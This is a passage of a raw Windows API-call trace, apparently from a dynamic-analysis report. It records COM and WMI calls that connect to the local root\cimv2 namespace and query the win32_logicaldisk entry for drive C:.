[7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0203.913] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0203.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0203.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0203.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0xbe2540) returned 0x0 [0203.913] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2540, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.913] WbemDefPath:IUnknown:Release (This=0xbe2540) returned 0x3 [0203.913] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0203.913] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0203.913] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0203.914] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0203.914] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x1 [0203.914] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0203.914] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0203.914] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f10, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6029f10) returned 0x0 [0203.914] WbemDefPath:IUnknown:AddRef (This=0x6029f10) returned 0x3 [0203.914] WbemDefPath:IUnknown:Release (This=0x6029f10) returned 0x2 [0203.914] WbemDefPath:IWbemPath:SetText (This=0x6029f10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetInfo (in: This=0x6029f10, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0203.914] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.914] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0203.914] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0203.914] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0203.914] IUnknown:Release (This=0xb51e34) returned 0x1 [0203.915] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027940) returned 0x0 [0203.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027940, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0203.915] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027940, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6029f80) returned 0x0 [0203.915] WbemDefPath:IUnknown:Release (This=0x6027940) returned 0x0 [0203.915] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6029f80) returned 0x0 [0203.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0203.916] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0203.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0203.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0203.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0xbe2640) returned 0x0 [0203.916] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2640, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.916] WbemDefPath:IUnknown:Release (This=0xbe2640) returned 0x3 [0203.916] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0203.916] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0203.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0203.916] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0203.916] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x1 [0203.916] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0203.916] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0203.916] WbemDefPath:IUnknown:QueryInterface (in: This=0x6029f80, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6029f80) returned 0x0 [0203.916] WbemDefPath:IUnknown:AddRef (This=0x6029f80) returned 0x3 [0203.916] WbemDefPath:IUnknown:Release (This=0x6029f80) returned 0x2 [0203.916] WbemDefPath:IWbemPath:SetText (This=0x6029f80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0203.916] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0203.917] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0203.917] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.917] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0203.917] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0203.917] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0203.917] IUnknown:Release (This=0xb51e34) returned 0x1 [0203.917] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6024bd8) returned 0x0 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x6024bd8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0203.918] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024bd8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60277d0) returned 0x0 [0203.918] WbemLocator:IUnknown:Release (This=0x6024bd8) returned 0x0 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60277d0) returned 0x0 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0203.918] WbemLocator:IUnknown:AddRef (This=0x60277d0) returned 0x3 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0203.918] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0203.918] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0203.918] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x2 [0203.918] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x1 [0203.918] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0203.918] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0203.918] WbemLocator:IUnknown:QueryInterface (in: This=0x60277d0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60277d0) returned 0x0 [0203.918] WbemLocator:IUnknown:AddRef (This=0x60277d0) returned 0x3 [0203.918] WbemLocator:IUnknown:Release (This=0x60277d0) returned 0x2 [0203.919] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f80, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0203.919] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0203.919] WbemDefPath:IWbemPath:GetText (in: This=0x6029f80, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.919] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027660) returned 0x0 [0203.919] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027660, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60332c4) returned 0x0 [0204.565] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5ac84) returned 0x0 [0204.565] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ac84, pProxy=0x60332c4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0204.565] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x1 [0204.565] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5aca4) returned 0x0 [0204.565] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5ac84) returned 0x0 [0204.565] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ac84, pProxy=0x60332c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0204.565] WbemLocator:IUnknown:Release (This=0xb5ac84) returned 0x2 [0204.565] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x1 [0204.565] CoTaskMemFree (pv=0xbd4918) [0204.565] WbemLocator:IUnknown:Release (This=0x6027660) returned 0x0 [0204.565] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5aca4) returned 0x0 [0204.566] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0204.568] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0204.569] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0204.569] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0204.570] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0204.571] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8df38 | out: ppvObject=0x6d8df38*=0xb5ac04) returned 0x0 [0204.571] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5ac04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8df40 | out: pCid=0x6d8df40*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.571] WbemLocator:IUnknown:Release (This=0xb5ac04) returned 0x3 [0204.571] CoGetContextToken (in: pToken=0x6d8df98 | out: pToken=0x6d8df98) returned 0x0 [0204.571] CoGetContextToken (in: pToken=0x6d8e3a0 | out: pToken=0x6d8e3a0) returned 0x0 [0204.571] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e430 | out: ppvObject=0x6d8e430*=0xb5ac8c) returned 0x0 [0204.571] WbemLocator:IRpcOptions:Query (in: This=0xb5ac8c, pPrx=0xb5aca4, dwProperty=2, pdwValue=0x6d8e458 | out: pdwValue=0x6d8e458) returned 0x80004002 [0204.571] WbemLocator:IUnknown:Release (This=0xb5ac8c) returned 0x3 [0204.571] WbemLocator:IUnknown:Release (This=0xb5aca4) returned 0x2 [0204.571] CoGetContextToken (in: pToken=0x6d8e978 | out: pToken=0x6d8e978) returned 0x0 [0204.571] CoGetContextToken (in: pToken=0x6d8e8d8 | out: pToken=0x6d8e8d8) returned 0x0 [0204.571] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x6d8e9a8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6d8e9a4 | out: ppvObject=0x6d8e9a4*=0x60332c4) returned 0x0 [0204.571] WbemLocator:IUnknown:AddRef (This=0x60332c4) returned 0x4 [0204.571] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x3 [0204.571] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x2 [0204.571] SysStringLen (param_1=0x0) returned 0x0 [0204.571] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6029f10, puCount=0x6d8ed3c | out: puCount=0x6d8ed3c*=0x0) returned 0x0 [0204.571] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x6d8ed38*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed38*=0x20, pszText=0x0) returned 0x0 [0204.571] WbemDefPath:IWbemPath:GetText (in: This=0x6029f10, lFlags=2, puBuffLength=0x6d8ed38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.571] CoGetContextToken (in: pToken=0x6d8e9a8 | out: pToken=0x6d8e9a8) returned 0x0 [0204.571] WbemLocator:IUnknown:AddRef (This=0xb5aca4) returned 0x3 [0204.571] WbemLocator:IUnknown:QueryInterface (in: This=0xb5aca4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e83c | out: ppvObject=0x6d8e83c*=0xb5aca4) returned 0x0 